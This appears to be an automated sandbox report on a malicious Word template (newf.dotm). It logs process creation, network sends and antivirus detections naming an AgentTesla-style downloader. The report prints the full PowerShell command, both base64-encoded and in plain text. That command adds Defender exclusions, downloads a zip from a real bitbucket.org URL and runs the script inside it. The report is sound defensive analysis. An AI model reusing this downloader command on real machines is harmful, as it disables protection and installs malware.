cmdline	powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACcAQwA6AFwAXABUAGUAbQBwAFwAXAAnACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFQAZQBtAHAAXAAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZgBvAHgAeABsAHIAZQBwAC8AcgBlAHAAbwAvAGQAbwB3AG4AbABvAGEAZABzAC8AegBpAHAALgB6AGkAcAAnACwAJwBDADoAXABcAFQAZQBtAHAAXABcAE4AZQB3AGYAaQBsAGUALgB6AGkAcAAnACkAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAnAEMAOgBcAFwAVABlAG0AcABcAFwATgBlAHcAZgBpAGwAZQAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABcAFQAZQBtAHAAXABcACcAIAAtAEYAbwByAGMAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwBDADoAXABcAFQAZQBtAHAAXABcAHMAYwByAGkAcAB0AC4AcABzADEAJwAiAA==
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\\Temp\\script.ps1
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPath 'C:\Temp\';Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/foxxlrep/repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C:\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powershell.exe -ArgumentList 'C:\\Temp\\script.ps1'"
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\\Temp\\script.ps1

Word document hooks document open

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 18, 2023, 6:58 p.m.	thread_identifier: 2376 thread_handle: 0x0000044c process_identifier: 2372 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPath 'C:\Temp\';Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/foxxlrep/repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C:\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powershell.exe -ArgumentList 'C:\\Temp\\script.ps1'" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000450	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 18, 2023, 6:58 p.m.	process_identifier: 804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 18, 2023, 6:58 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	(

Poweshell is sending data to a remote host (2 events)

Data sent	pld>iÝM¾¥´r´aËÉ;Â*Ô>=6w'®ÊVkÉ/5 ÀÀÀ À 28+ÿ bitbucket.org
Data sent	pld>iÞÊ%ú¾£zçè£¨]Á`)åMâ&/5 ÀÀÀ À 28+ÿ bitbucket.org

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 18, 2023, 6:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 6:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 18, 2023, 6:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

winword.exe

martian_process

powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACcAQwA6AFwAXABUAGUAbQBwAFwAXAAnACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFQAZQBtAHAAXAAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZgBvAHgAeABsAHIAZQBwAC8AcgBlAHAAbwAvAGQAbwB3AG4AbABvAGEAZABzAC8AegBpAHAALgB6AGkAcAAnACwAJwBDADoAXABcAFQAZQBtAHAAXABcAE4AZQB3AGYAaQBsAGUALgB6AGkAcAAnACkAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAnAEMAOgBcAFwAVABlAG0AcABcAFwATgBlAHcAZgBpAGwAZQAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABcAFQAZQBtAHAAXABcACcAIAAtAEYAbwByAGMAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwBDADoAXABcAFQAZQBtAHAAXABcAHMAYwByAGkAcAB0AC4AcABzADEAJwAiAA==

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send April 18, 2023, 6:58 p.m.	buffer: pld>iÝM¾¥´r´aËÉ;Â*Ô>=6w'®ÊVkÉ/5 ÀÀÀ À 28+ÿ bitbucket.org socket: 1348 sent: 117	1	117	0
send April 18, 2023, 6:58 p.m.	buffer: pld>iÞÊ%ú¾£zçè£¨]Á`)åMâ&/5 ÀÀÀ À 28+ÿ bitbucket.org socket: 1348 sent: 117	1	117	0

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPath 'C:\Temp\';Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/foxxlrep/repo/downloads/zip.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C:\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process powershell.exe -ArgumentList 'C:\\Temp\\script.ps1'"
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\\Temp\\script.ps1
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\\Temp\\script.ps1
parent_process	winword.exe	martian_process	powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACcAQwA6AFwAXABUAGUAbQBwAFwAXAAnACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFQAZQBtAHAAXAAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZgBvAHgAeABsAHIAZQBwAC8AcgBlAHAAbwAvAGQAbwB3AG4AbABvAGEAZABzAC8AegBpAHAALgB6AGkAcAAnACwAJwBDADoAXABcAFQAZQBtAHAAXABcAE4AZQB3AGYAaQBsAGUALgB6AGkAcAAnACkAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAnAEMAOgBcAFwAVABlAG0AcABcAFwATgBlAHcAZgBpAGwAZQAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABcAFQAZQBtAHAAXABcACcAIAAtAEYAbwByAGMAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwBDADoAXABcAFQAZQBtAHAAXABcAHMAYwByAGkAcAB0AC4AcABzADEAJwAiAA==

Creates a suspicious Powershell process (4 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	VB.Heur.PwShell.18.F361B9BD.Gen
Sangfor	VBA.Sus.Obf
Arcabit	VB.Heur.PwShell.18.F361B9BD.Gen
Symantec	CL.Downloader!gen69
ESET-NOD32	a variant of VBA/TrojanDownloader.Agent.YBD
Avast	Script:SNH-gen [Trj]
ClamAV	Win.Dropper.AgentTesla-9969002-0
Kaspersky	HEUR:Trojan.Script.Adb.a
BitDefender	VB.Heur.PwShell.18.F361B9BD.Gen
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
TACHYON	Suspicious/WOX.XSR.Gen
Emsisoft	VB.Heur.PwShell.18.F361B9BD.Gen (B)
VIPRE	VB.Heur.PwShell.18.F361B9BD.Gen
McAfee-GW-Edition	BehavesLike.Downloader.lc
FireEye	VB.Heur.PwShell.18.F361B9BD.Gen
SentinelOne	Static AI - Malicious OPENXML
GData	VB.Heur.PwShell.18.F361B9BD.Gen
ZoneAlarm	HEUR:Trojan.Script.Adb.a
Google	Detected
Acronis	suspicious
MAX	malware (ai score=83)
Rising	Malware.Obfus/VBA@AI.100 (VBA)
AVG	Script:SNH-gen [Trj]

Powershell Downloader DFSP detected (1 event)

The process powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

newf.dotm

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All